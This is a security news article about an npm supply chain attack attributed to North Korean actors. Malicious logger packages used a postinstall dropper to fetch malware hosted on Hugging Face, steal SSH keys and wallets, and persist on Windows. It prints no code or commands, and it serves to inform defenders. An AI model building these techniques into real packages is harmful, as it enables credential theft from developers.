Hackers Exploit Hugging Face in Supply Chain Attack
Hackers have discovered a new method to exploit Hugging Face, a prominent platform in the AI community, to distribute malware. Linked to North Korea, these threat actors have embedded second-stage malware within Hugging Face, transforming it into a vehicle for a sophisticated npm supply chain attack. The attack, which affects software developers globally, cleverly uses Hugging Face as a malware delivery channel and a conduit for data exfiltration.
Initial Attack Vector and Malicious Packages
The attack originated with an npm package named “terminal-logger-utils,” masquerading as a standard development tool. This package was part of a larger scheme involving three additional packages: pretty-logger-utils, ts-logger-pack, and pinno-loggers. These packages propagated the malicious code further, putting any developer who installed them at significant risk. The malware was designed to steal sensitive data such as Telegram information, SSH keys, cryptocurrency wallets, and more.
Security researchers at OX Security identified these malicious packages and linked them to known North Korean cyber operations. The threat actor, operating under the npm account “jpeek895,” had been previously identified for similar activities. The malicious package exhibited keylogger, infostealer, and remote access trojan (RAT) capabilities, making it a particularly dangerous threat.
Hugging Face as a Concealed Malware Host
One of the standout features of this attack is the strategic use of Hugging Face to avoid detection. Instead of hosting malware on suspicious servers, the attackers used Hugging Face’s trusted platform to host the second-stage binary. This tactic allowed malicious traffic to blend seamlessly with regular AI research activities, thus evading security checks.
Stolen data was uploaded to private datasets on Hugging Face, further concealing the malicious activity. The npm maintainer accounts related to the dependent packages played a critical role in spreading the infection. Developers who interacted with these packages are urged to check their environments for compromise.
Technical Details and Security Measures
The malware initiates its attack through a postinstall hook in the package.json file. When a developer executes npm install, the hook triggers a file called utils.cjs, an obfuscated malware dropper that fetches the appropriate binary from Hugging Face based on the victim’s operating system. This binary, a Node.js Single Executable Application, allows the attacker full control over the compromised machine.
Once installed, the malware establishes persistence on Windows systems by creating a hidden VBS launcher and a scheduled task, while also setting a registry Run key as a backup. The malware is capable of self-updating by connecting to the attacker’s Hugging Face repository, allowing for seamless updates without reinfection.
Security teams are advised to immediately remove the malware, block network requests to known indicators of compromise, and enforce full key rotation with two-factor authentication. Developers should treat unfamiliar postinstall scripts with caution and prefer secure lockfile-driven installations in CI environments.
